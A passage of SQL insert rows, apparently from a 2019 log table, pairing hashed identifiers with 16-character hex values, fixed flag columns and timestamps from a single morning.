(84371, '8fd28419e05354c1b0d55e3812234902', 'e9f4076e834ba7fe', 0, 2, 1, '2019-04-28 06:27:12'),
(84372, '9ecf0ba6ae0ad8b57dfe3a1f266eb1c6', '155a6ebefb18c97a', 0, 2, 1, '2019-04-28 06:29:18'),
(84373, '98c8ab4afefc3011a94a45a8583774b6', '44dbb16e9c927e68', 0, 2, 1, '2019-04-28 06:29:49'),
(84374, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-28 06:30:00'),
(84375, '9ecf0ba6ae0ad8b57dfe3a1f266eb1c6', '155a6ebefb18c97a', 0, 2, 1, '2019-04-28 06:30:04'),
(84376, '9ecf0ba6ae0ad8b57dfe3a1f266eb1c6', '155a6ebefb18c97a', 0, 2, 1, '2019-04-28 06:30:14'),
(84377, '9ecf0ba6ae0ad8b57dfe3a1f266eb1c6', '155a6ebefb18c97a', 0, 2, 1, '2019-04-28 06:31:08'),
(84378, '516f60381cf8bcdcffea883b41b9cc4a', '22b4b758a2595d1b', 0, 2, 1, '2019-04-28 06:31:30'),
(84379, '7b47524795d9d6e2aaedc14b65167eea', '27888710845592b1', 0, 2, 1, '2019-04-28 06:31:35'),
(84380, '1dd3670eb1bb614b091399ddaf12d1a6', '85c87c6892dfb12d', 0, 2, 1, '2019-04-28 06:31:37'),
(84381, '516f60381cf8bcdcffea883b41b9cc4a', '22b4b758a2595d1b', 0, 2, 1, '2019-04-28 06:31:44'),
(84382, '28e720fd4bbd4e6201e81e89c9bb8ceb', 'c82195f7827b9487', 0, 2, 1, '2019-04-28 06:33:54'),
(84383, '28e720fd4bbd4e6201e81e89c9bb8ceb', 'c82195f7827b9487', 0, 2, 1, '2019-04-28 06:34:11'),
(84384, '516f60381cf8bcdcffea883b41b9cc4a', '22b4b758a2595d1b', 0, 2, 1, '2019-04-28 06:34:36'),
(84385, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-28 06:35:09'),
(84386, '98c8ab4afefc3011a94a45a8583774b6', '44dbb16e9c927e68', 0, 2, 1, '2019-04-28 06:38:18'),
(84387, '98c8ab4afefc3011a94a45a8583774b6', '44dbb16e9c927e68', 0, 2, 1, '2019-04-28 06:39:50'),
(84388, 'b83d30b3d66f58f5ddc637e36862ba12', '9bd6c23c7090db5b', 0, 2, 1, '2019-04-28 06:40:04'),
(84389, 'd65103ec9816453f76cb071351aef4f8', 'b3572442b61928b3', 0, 2, 1, '2019-04-28 06:40:08'),
(84390, 'be4987573a72e000647d444d8baaa842', 'df27b9a2919a8206', 0, 2, 1, '2019-04-28 06:41:38'),
(84391, '7b47524795d9d6e2aaedc14b65167eea', '27888710845592b1', 0, 2, 1, '2019-04-28 06:41:53'),
(84392, '7b47524795d9d6e2aaedc14b65167eea', '27888710845592b1', 0, 2, 1, '2019-04-28 06:43:22'),
(84393, '5893809a0e72f9642a0892c1dea9f302', 'ff943bd4be7d6ba5', 0, 2, 1, '2019-04-28 06:43:39'),
(84394, '98c8ab4afefc3011a94a45a8583774b6', '44dbb16e9c927e68', 0, 2, 1, '2019-04-28 06:44:02'),
(84395, '5893809a0e72f9642a0892c1dea9f302', 'ff943bd4be7d6ba5', 0, 2, 1, '2019-04-28 06:45:36'),
(84396, '98c8ab4afefc3011a94a45a8583774b6', '44dbb16e9c927e68', 0, 2, 1, '2019-04-28 06:46:46'),
(84397, 'f6813cda3e8313e831dca00b46b308ba', 'f7219a62f6d3479e', 0, 2, 1, '2019-04-28 06:47:30'),
(84398, 'e7b0d69dcca15729c368b3b8af4a92e1', '3de88ff4581dab27', 0, 2, 1, '2019-04-28 06:47:39'),
(84399, 'f6813cda3e8313e831dca00b46b308ba', 'f7219a62f6d3479e', 0, 2, 1, '2019-04-28 06:47:39'),
(84400, 'e7b0d69dcca15729c368b3b8af4a92e1', '3de88ff4581dab27', 0, 2, 1, '2019-04-28 06:48:32'),
(84401, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-28 06:50:50'),
(84402, '7e6fba43def446a835eeca856d54647f', '620a00bd218b158c', 0, 2, 1, '2019-04-28 06:52:02'),
(84403, '28e720fd4bbd4e6201e81e89c9bb8ceb', 'c82195f7827b9487', 0, 2, 1, '2019-04-28 06:52:23'),
(84404, '98c8ab4afefc3011a94a45a8583774b6', '44dbb16e9c927e68', 0, 2, 1, '2019-04-28 06:53:24'),
(84405, '98c8ab4afefc3011a94a45a8583774b6', '44dbb16e9c927e68', 0, 2, 1, '2019-04-28 06:55:08'),
(84406, '28ed3f1b07091cd69ed2fe157f70d8f4', 'f611c3e853269389', 0, 2, 1, '2019-04-28 06:58:29'),
(84407, '0d9c79cf143f98efec9a060359609a2b', '93ae106c269fae3f', 0, 2, 1, '2019-04-28 06:59:42'),
(84408, '28ed3f1b07091cd69ed2fe157f70d8f4', 'f611c3e853269389', 0, 2, 1, '2019-04-28 07:00:14'),
(84409, '28ed3f1b07091cd69ed2fe157f70d8f4', 'f611c3e853269389', 0, 2, 1, '2019-04-28 07:00:33'),
(84410, '0d9c79cf143f98efec9a060359609a2b', '93ae106c269fae3f', 0, 2, 1, '2019-04-28 07:01:56'),
(84411, 'c47729f123919d7d1c3019e6857dbf85', '433577cdf4c8f98a', 0, 2, 1, '2019-04-28 07:01:57'),
(84412, 'c47729f123919d7d1c3019e6857dbf85', '433577cdf4c8f98a', 0, 2, 1, '2019-04-28 07:02:54'),
(84413, 'c47729f123919d7d1c3019e6857dbf85', '433577cdf4c8f98a', 0, 2, 1, '2019-04-28 07:03:09'),
(84414, '9cb19b1d29ce56a43811ab96d6f7c57f', '5fa71acfcd440189', 0, 2, 1, '2019-04-28 07:05:45'),
(84415, '0f9d943bdbae2dfb685c916e2de116ac', 'c4c9002176fd8f74', 0, 2, 1, '2019-04-28 07:08:56'),
(84416, '103fc19780a1a362c5047aba3610426d', 'bbc9866411ee9a1c', 0, 2, 1, '2019-04-28 07:09:17'),
(84417, 'c47729f123919d7d1c3019e6857dbf85', '433577cdf4c8f98a', 0, 2, 1, '2019-04-28 07:11:00'),
(84418, 'a5d98850d14af80d275fd642a78b678a', 'ce935a075956f689', 0, 2, 1, '2019-04-28 07:14:25'),
(84419, '60980730e2af30becb501a6b1052e120', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-28 07:14:49'),
(84420, '98c8ab4afefc3011a94a45a8583774b6', '44dbb16e9c927e68', 0, 2, 1, '2019-04-28 07:14:53'),
(84421, '60980730e2af30becb501a6b1052e120', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-28 07:15:23'),
(84422, 'a5d98850d14af80d275fd642a78b678a', 'ce935a075956f689', 0, 2, 1, '2019-04-28 07:17:06'),
(84423, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-28 07:17:13'),
(84424, '8fd28419e05354c1b0d55e3812234902', 'e9f4076e834ba7fe', 0, 2, 1, '2019-04-28 07:17:41'),
(84425, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-28 07:21:41'),
(84426, '9ecf0ba6ae0ad8b57dfe3a1f266eb1c6', '155a6ebefb18c97a', 0, 2, 1, '2019-04-28 07:23:03'),
(84427, 'a5d98850d14af80d275fd642a78b678a', 'ce935a075956f689', 0, 2, 1, '2019-04-28 07:24:31'),
(84428, '2e98773e058719b8380323c6f726c85a', 'd57c6a47a6711062', 0, 2, 1, '2019-04-28 07:27:44'),
(84429, 'a5d98850d14af80d275fd642a78b678a', 'ce935a075956f689', 0, 2, 1, '2019-04-28 07:29:59'),
(84430, 'dfdd6d9c9742abfb8573a207a0746a9a', 'f611c3e853269389', 0, 2, 1, '2019-04-28 07:33:26'),
(84431, '7b47524795d9d6e2aaedc14b65167eea', '27888710845592b1', 0, 2, 1, '2019-04-28 07:34:55'),
(84432, '665c31b2692e45444f62ed627af98861', '10de9b529eeb73b3', 0, 2, 1, '2019-04-28 07:39:02'),
(84433, '103fc19780a1a362c5047aba3610426d', 'bbc9866411ee9a1c', 0, 2, 1, '2019-04-28 07:41:03'),
(84434, '52bb24401a63f852f59875d9ee54db26', '0ae9db6b9a3bc746', 0, 2, 1, '2019-04-28 07:41:25'),
(84435, '8210b27b08b214c3eb74b0e67d517af7', 'd7036fef56eff751', 0, 2, 1, '2019-04-28 07:45:01'),
(84436, '98afb18417c97559cbcc0f572a809e56', '7d3e015101cab243', 0, 2, 1, '2019-04-28 07:52:18'),
(84437, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 07:54:50'),
(84438, '246ec56c644affed3d9d5b0df23630f6', 'bd6bd2fba8dd4e34', 0, 2, 1, '2019-04-28 07:55:33'),
(84439, '2e98773e058719b8380323c6f726c85a', 'd57c6a47a6711062', 0, 2, 1, '2019-04-28 07:56:20'),
(84440, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 07:58:52'),
(84441, 'e7b0d69dcca15729c368b3b8af4a92e1', '3de88ff4581dab27', 0, 2, 1, '2019-04-28 08:02:04'),
(84442, '5893809a0e72f9642a0892c1dea9f302', 'ff943bd4be7d6ba5', 0, 2, 1, '2019-04-28 08:04:10'),
(84443, 'bfd9889d7fbcce24e3c0c4f6a7d7c9c7', 'a4606350cb27c277', 0, 2, 1, '2019-04-28 08:07:54'),
(84444, 'bfd9889d7fbcce24e3c0c4f6a7d7c9c7', 'a4606350cb27c277', 0, 2, 1, '2019-04-28 08:08:08'),
(84445, '5893809a0e72f9642a0892c1dea9f302', 'ff943bd4be7d6ba5', 0, 2, 1, '2019-04-28 08:10:05'),
(84446, 'b83d30b3d66f58f5ddc637e36862ba12', '9bd6c23c7090db5b', 0, 2, 1, '2019-04-28 08:10:16'),
(84447, '5893809a0e72f9642a0892c1dea9f302', 'ff943bd4be7d6ba5', 0, 2, 1, '2019-04-28 08:10:35'),
(84448, '0c6f62b6eacdc35e26879fc89390cd31', 'ebdbde935097fd25', 0, 2, 1, '2019-04-28 08:12:48'),
(84449, '925f1e9ade72761dba6324c45e4a68f8', '96838f2a075a32df', 0, 2, 1, '2019-04-28 08:13:09'),
(84450, '925f1e9ade72761dba6324c45e4a68f8', '96838f2a075a32df', 0, 2, 1, '2019-04-28 08:13:35'),
(84451, '925f1e9ade72761dba6324c45e4a68f8', '96838f2a075a32df', 0, 2, 1, '2019-04-28 08:13:42'),
(84452, '31e3b1dbc3a5cd9a2ab40c68e1fb1927', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-28 08:14:11'),
(84453, 'f8a6a766693b277452d72714e0851c90', '3c6c110f4417344b', 0, 2, 1, '2019-04-28 08:18:43'),
(84454, '1446624708ea2630b8b55cf67ce62b2e', 'db57ce6e9b1c7722', 0, 2, 1, '2019-04-28 08:19:56'),
(84455, '1446624708ea2630b8b55cf67ce62b2e', 'db57ce6e9b1c7722', 0, 2, 1, '2019-04-28 08:20:05'),
(84456, '7c4bff0bf9015f40c1aa4994f1740f2d', 'b79d88d8e513e980', 0, 2, 1, '2019-04-28 08:26:59'),
(84457, '45f524603220b44f893f3890144e9054', '61bdcb2c64b8a3cc', 0, 2, 1, '2019-04-28 08:29:11'),
(84458, '000e71eb33230b32cfcf746a91cdb8af', 'cfa25db1eefd0d2a', 0, 2, 1, '2019-04-28 08:35:40'),
(84459, '000e71eb33230b32cfcf746a91cdb8af', 'cfa25db1eefd0d2a', 0, 2, 1, '2019-04-28 08:35:53'),
(84460, 'c66050d9d5b4c18f60400700669c6047', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 08:37:09'),
(84461, 'c66050d9d5b4c18f60400700669c6047', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 08:37:38'),
(84462, 'f532774a66c054356e17e4f5c7942f89', '9968c5be4a7971a2', 0, 2, 1, '2019-04-28 08:38:05'),
(84463, 'bd8dafc4cb208ad87b6db8e8f5ed63c1', '19ac418837a1bfb6', 0, 2, 1, '2019-04-28 08:38:40'),
(84464, 'c66050d9d5b4c18f60400700669c6047', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 08:38:59'),
(84465, '1dd0ae7413e5b90f2a9ba24a69970109', '318fd0ceade29704', 0, 2, 1, '2019-04-28 08:39:36'),
(84466, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 08:44:59'),
(84467, '003e285945892d6997abd2f19d371679', '0e65a12316be14d6', 0, 2, 1, '2019-04-28 08:46:39'),
(84468, '3b2a15b4e2704a3061acd413b49a4a25', '3bece7bd84369fae', 0, 2, 1, '2019-04-28 08:52:25'),
(84469, '3d36423aa59e3014b3b632531e48fb3c', 'da8ceca89cfcb758', 0, 2, 1, '2019-04-28 08:53:16'),
(84470, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 08:53:22'),
(84471, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:00:50'),
(84472, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:00:54'),
(84473, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 09:04:24'),
(84474, '7c4bff0bf9015f40c1aa4994f1740f2d', 'b79d88d8e513e980', 0, 2, 1, '2019-04-28 09:07:16'),
(84475, 'a0cd0f4f180a2b44464ad6835f579e65', 'ac33594970c7899d', 0, 2, 1, '2019-04-28 09:07:24'),
(84476, '83b5b5d4b3242c9e7ef9e36570a47fc7', '318fd0ceade29704', 0, 2, 1, '2019-04-28 09:08:15'),
(84477, '7b47524795d9d6e2aaedc14b65167eea', '27888710845592b1', 0, 2, 1, '2019-04-28 09:09:09'),
(84478, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 09:11:48'),
(84479, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 09:11:54'),
(84480, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 09:12:24'),
(84481, '6c367c896631a7f5bbb73759be062581', 'f611c3e853269389', 0, 2, 1, '2019-04-28 09:14:31'),
(84482, 'fb6b8593c2ebe0145a42e3f9d5d792ad', '76ed9cbc7a5d0626', 0, 2, 1, '2019-04-28 09:15:03'),
(84483, '6c367c896631a7f5bbb73759be062581', 'f611c3e853269389', 0, 2, 1, '2019-04-28 09:16:09'),
(84484, '6c367c896631a7f5bbb73759be062581', 'f611c3e853269389', 0, 2, 1, '2019-04-28 09:16:52'),
(84485, '6af66f3978280ee467e37a2975a1798e', 'd57c6a47a6711062', 0, 2, 1, '2019-04-28 09:19:40'),
(84486, '3b2a15b4e2704a3061acd413b49a4a25', '3bece7bd84369fae', 0, 2, 1, '2019-04-28 09:20:02'),
(84487, '6af66f3978280ee467e37a2975a1798e', 'd57c6a47a6711062', 0, 2, 1, '2019-04-28 09:20:45'),
(84488, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 09:23:22'),
(84489, '7c4bff0bf9015f40c1aa4994f1740f2d', 'b79d88d8e513e980', 0, 2, 1, '2019-04-28 09:24:44'),
(84490, '90485525fa2a70fcaaf1d6cc64954bb7', 'c70308d9173a7221', 0, 2, 1, '2019-04-28 09:24:51'),
(84491, '93bc7e4810bd1730edfa7588ead3ba45', '7fefe9d951de68e2', 0, 2, 1, '2019-04-28 09:25:05'),
(84492, '954ca20e43b934ffbb82ca8adfa1f46e', 'f4b0cdf890a27c29', 0, 2, 1, '2019-04-28 09:25:58'),
(84493, 'ad6c5f4324468d5b1f64d9a3b846b2f4', '629ac4ab56bd2f1d', 0, 2, 1, '2019-04-28 09:27:02'),
(84494, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:32:34'),
(84495, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:33:17'),
(84496, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:33:59'),
(84497, '86c5944071906dec24335d457e742d35', 'a5e3bac88e1102ef', 0, 2, 1, '2019-04-28 09:34:13'),
(84498, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:34:26'),
(84499, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:34:37'),
(84500, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:35:31'),
(84501, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 09:35:36'),
(84502, 'e1b8733c6c6256f865b72b9c5a85bb48', '8d6cd92c6bf86a96', 0, 2, 1, '2019-04-28 09:35:36'),
(84503, '86c5944071906dec24335d457e742d35', 'a5e3bac88e1102ef', 0, 2, 1, '2019-04-28 09:35:45'),
(84504, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 09:36:17'),
(84505, 'e1b8733c6c6256f865b72b9c5a85bb48', '8d6cd92c6bf86a96', 0, 2, 1, '2019-04-28 09:37:55'),
(84506, '0f9d943bdbae2dfb685c916e2de116ac', 'c4c9002176fd8f74', 0, 2, 1, '2019-04-28 09:39:01'),
(84507, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:39:21'),
(84508, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:39:44'),
(84509, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:40:14'),
(84510, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:40:24'),
(84511, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:40:55'),
(84512, '7295785ec7f0ee93fd8c01e4e199470e', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 09:41:00'),
(84513, '7295785ec7f0ee93fd8c01e4e199470e', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 09:41:21'),
(84514, '1dd3670eb1bb614b091399ddaf12d1a6', '85c87c6892dfb12d', 0, 2, 1, '2019-04-28 09:41:28'),
(84515, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:41:29'),
(84516, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:41:40'),
(84517, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:41:58'),
(84518, 'e1b8733c6c6256f865b72b9c5a85bb48', '8d6cd92c6bf86a96', 0, 2, 1, '2019-04-28 09:42:18'),
(84519, '7295785ec7f0ee93fd8c01e4e199470e', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 09:42:42'),
(84520, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:42:51'),
(84521, '86c5944071906dec24335d457e742d35', 'a5e3bac88e1102ef', 0, 2, 1, '2019-04-28 09:42:58'),
(84522, '86c5944071906dec24335d457e742d35', 'a5e3bac88e1102ef', 0, 2, 1, '2019-04-28 09:43:28'),
(84523, '575b58ed128b38f19ccb8c5150c3210b', 'a66da04c3fc4b7c7', 0, 2, 1, '2019-04-28 09:44:07'),
(84524, 'f8da62aff8caaaed5dc44d89123b4988', '5db1d297c6abec7e', 0, 2, 1, '2019-04-28 09:46:28'),
(84525, '0b83af4691b9c52d32fa2287e8776370', '318fd0ceade29704', 0, 2, 1, '2019-04-28 09:46:48'),
(84526, '0b83af4691b9c52d32fa2287e8776370', '318fd0ceade29704', 0, 2, 1, '2019-04-28 09:47:37'),
(84527, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 09:48:08'),
(84528, '210545a799ed46a25f1034cd55f81da9', 'b6b0ed0aa8f39a66', 0, 2, 1, '2019-04-28 09:49:12'),
(84529, '52d6a03d94406c8938eded2997030ead', '0a3c059ff9af6559', 0, 2, 1, '2019-04-28 09:49:14'),
(84530, '954ca20e43b934ffbb82ca8adfa1f46e', 'f4b0cdf890a27c29', 0, 2, 1, '2019-04-28 09:50:06'),
(84531, '210545a799ed46a25f1034cd55f81da9', 'b6b0ed0aa8f39a66', 0, 2, 1, '2019-04-28 09:50:32'),
(84532, '6af66f3978280ee467e37a2975a1798e', 'd57c6a47a6711062', 0, 2, 1, '2019-04-28 09:50:50'),
(84533, '52d6a03d94406c8938eded2997030ead', '0a3c059ff9af6559', 0, 2, 1, '2019-04-28 09:50:59'),
(84534, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-04-28 09:52:52'),
(84535, '5af0907e13e06c13bfb45a5165f09f14', 'b52f874bcdaea152', 0, 2, 1, '2019-04-28 09:52:56'),
(84536, '3b2a15b4e2704a3061acd413b49a4a25', '3bece7bd84369fae', 0, 2, 1, '2019-04-28 09:55:22'),
(84537, '7295785ec7f0ee93fd8c01e4e199470e', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 09:56:05'),
(84538, 'fc273071600d64c2036ef6c82e83c3a8', '87f2e25ccc67881b', 0, 2, 1, '2019-04-28 09:56:06'),
(84539, '005f744b11429f638642262bef814c7e', '324d0c5c1f480926', 0, 2, 1, '2019-04-28 09:56:48'),
(84540, '7295785ec7f0ee93fd8c01e4e199470e', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 09:56:59'),
(84541, '7295785ec7f0ee93fd8c01e4e199470e', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 09:57:18'),
(84542, '7295785ec7f0ee93fd8c01e4e199470e', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 09:57:39'),
(84543, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 09:58:31'),
(84544, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 10:01:20'),
(84545, '027a8baa594421ce7f5e131305a08796', '923b8aa0711aa869', 0, 2, 1, '2019-04-28 10:02:02'),
(84546, '222259b1d4dcbac88ddc630bd9ca79a1', '332723ec6654d9f5', 0, 2, 1, '2019-04-28 10:02:29'),
(84547, 'f6934b08ae7a58ecf33ade4b063c4e1d', 'b0e9c29ed05e8ca4', 0, 2, 1, '2019-04-28 10:03:33'),
(84548, 'cbf588b43d4181ce930ded3dd298a0e1', '32b169e936bbe5df', 0, 2, 1, '2019-04-28 10:03:45'),
(84549, '86c5944071906dec24335d457e742d35', 'a5e3bac88e1102ef', 0, 2, 1, '2019-04-28 10:04:36'),
(84550, 'a64c0ceffe92e9cc091fd398a9581118', '07e7c740f81a635a', 0, 2, 1, '2019-04-28 10:04:47'),
(84551, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-28 10:04:58'),
(84552, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-28 10:05:01'),
(84553, 'bcd14eface7dafe80a77e31d61fd22d2', 'd76d7333a72169c4', 0, 2, 1, '2019-04-28 10:06:39'),
(84554, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 10:07:53'),
(84555, 'a64c0ceffe92e9cc091fd398a9581118', '07e7c740f81a635a', 0, 2, 1, '2019-04-28 10:08:12'),
(84556, 'a64c0ceffe92e9cc091fd398a9581118', '07e7c740f81a635a', 0, 2, 1, '2019-04-28 10:09:28'),
(84557, '52d6a03d94406c8938eded2997030ead', '0a3c059ff9af6559', 0, 2, 1, '2019-04-28 10:10:36'),
(84558, 'a64c0ceffe92e9cc091fd398a9581118', '07e7c740f81a635a', 0, 2, 1, '2019-04-28 10:10:38'),
(84559, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-04-28 10:11:06'),
(84560, '86c5944071906dec24335d457e742d35', 'a5e3bac88e1102ef', 0, 2, 1, '2019-04-28 10:11:22'),
(84561, '8404db678bf0937abeab5ba9bf326027', '76ea8e11c25595c1', 0, 2, 1, '2019-04-28 10:11:36'),
(84562, '52d6a03d94406c8938eded2997030ead', '0a3c059ff9af6559', 0, 2, 1, '2019-04-28 10:11:55'),
(84563, '52d6a03d94406c8938eded2997030ead', '0a3c059ff9af6559', 0, 2, 1, '2019-04-28 10:12:18'),
(84564, '8404db678bf0937abeab5ba9bf326027', '76ea8e11c25595c1', 0, 2, 1, '2019-04-28 10:12:26'),
(84565, '0399e95d6587e3258ee46be635b113da', '11e6aced22c26021', 0, 2, 1, '2019-04-28 10:12:36'),
(84566, '4287cc11e721620af35e058e44cae03e', 'edf2c421aa613309', 0, 2, 1, '2019-04-28 10:12:38'),
(84567, '52d6a03d94406c8938eded2997030ead', '0a3c059ff9af6559', 0, 2, 1, '2019-04-28 10:12:58'),
(84568, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-04-28 10:14:35'),
(84569, '222259b1d4dcbac88ddc630bd9ca79a1', '332723ec6654d9f5', 0, 2, 1, '2019-04-28 10:15:02'),
(84570, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 10:17:19'),
(84571, '02f05f261159c1fb436a085d90d23023', 'dace6e0c219330fc', 0, 2, 1, '2019-04-28 10:17:51'),
(84572, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-28 10:17:51'),
(84573, 'dd3db8090af62616e984d08a1c673962', '93ae106c269fae3f', 0, 2, 1, '2019-04-28 10:18:45'),
(84574, '3b2a15b4e2704a3061acd413b49a4a25', '3bece7bd84369fae', 0, 2, 1, '2019-04-28 10:18:51'),
(84575, '429b33253a53ba1a65eb3d1b061f7e03', '698ce5499eb4cb2a', 0, 2, 1, '2019-04-28 10:19:53'),
(84576, 'b1cb19ea4a56a26042805c3ed4031a2a', 'ef0ca87bfaada93e', 0, 2, 1, '2019-04-28 10:20:01'),
(84577, 'b1cb19ea4a56a26042805c3ed4031a2a', 'ef0ca87bfaada93e', 0, 2, 1, '2019-04-28 10:20:25'),
(84578, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-28 10:20:46'),
(84579, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-04-28 10:21:02'),
(84580, '0791fdc841da09fba22249859d8ebd84', '0c3b18a297f7fa46', 0, 2, 1, '2019-04-28 10:21:09'),
(84581, '429b33253a53ba1a65eb3d1b061f7e03', '698ce5499eb4cb2a', 0, 2, 1, '2019-04-28 10:21:15'),
(84582, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-04-28 10:22:09'),
(84583, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-04-28 10:22:34'),
(84584, '1605a5732988c7ebe1ba5ad88ba43844', 'd1f8ea0116bd1437', 0, 2, 1, '2019-04-28 10:22:34'),
(84585, '7295785ec7f0ee93fd8c01e4e199470e', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-28 10:22:47'),
(84586, 'c103e6d3788994f4852a5e3a1008bd64', '0530018377078939', 0, 2, 1, '2019-04-28 10:24:01'),
(84587, 'ad6c5f4324468d5b1f64d9a3b846b2f4', '629ac4ab56bd2f1d', 0, 2, 1, '2019-04-28 10:25:23'),
(84588, '98afb18417c97559cbcc0f572a809e56', '7d3e015101cab243', 0, 2, 1, '2019-04-28 10:25:33'),
(84589, '86c5944071906dec24335d457e742d35', 'a5e3bac88e1102ef', 0, 2, 1, '2019-04-28 10:26:00'),
(84590, '027a8baa594421ce7f5e131305a08796', '923b8aa0711aa869', 0, 2, 1, '2019-04-28 10:26:29'),
(84591, 'dda738f7213082270bb9e6d7fbb3fe6b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-28 10:26:50'),
(84592, '005f744b11429f638642262bef814c7e', '324d0c5c1f480926', 0, 2, 1, '2019-04-28 10:27:38'),
(84593, '005f744b11429f638642262bef814c7e', '324d0c5c1f480926', 0, 2, 1, '2019-04-28 10:28:07'),
(84594, '6bedbf483410b3a6404780444716046d', 'a83e11812aff7ff7', 0, 2, 1, '2019-04-28 10:28:11'),
(84595, '1d061d494140ec7470d53ffb5d735ef1', 'edfe950d47379572', 0, 2, 1, '2019-04-28 10:28:19'),
(84596, '1d061d494140ec7470d53ffb5d735ef1', 'edfe950d47379572', 0, 2, 1, '2019-04-28 10:28:25'),
(84597, '10741cb4d07e4ddf6b35f12f577f4d54', 'f10990f26adcd1c5', 0, 2, 1, '2019-04-28 10:29:04'),
(84598, 'ac03fddb555a7b40bb782dff1bca847d', '93185d3eaa36a198', 0, 2, 1, '2019-04-28 10:29:35'),
